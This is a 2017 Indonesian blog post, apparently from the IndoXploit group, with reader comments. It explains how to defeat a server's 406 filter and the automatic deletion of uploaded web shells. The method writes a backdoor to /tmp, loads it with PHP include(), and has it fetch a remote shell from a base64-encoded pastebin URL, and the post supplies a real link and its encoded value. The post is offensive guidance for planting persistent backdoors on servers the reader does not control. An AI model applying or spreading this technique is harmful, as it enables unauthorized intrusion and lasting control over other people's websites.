Friday, 7 July 2017

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah pada bagian $URL='xxxx', xxxx merupakan link shell kalian yang di encode dengan base64. 
Contohnya saya akan memanggil shell backdoor IDX V.2. 
Link Shell (https://pastebin.com/raw/nC6pWh5a) encode ke base64 (aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25DNnBXaDVhCg==).

Sehingga menjadi:
$URL='aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25DNnBXaDVhCg==';
Kalian bisa menggunakan website encode base64 online (www.base64encode.org)
Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

3 comments:

  1. Jadi, kan saya sudah upload https://pastebin.com/z8WiCv3S pada dir /tmp bisa dijelaskan apa yang harus dilakukan lagi?

    ReplyDelete
    Replies
    1. bukan di upload di /tmp gan, tapi upload aja di tempat yang biasa

      Delete
    2. This comment has been removed by the author.

      Delete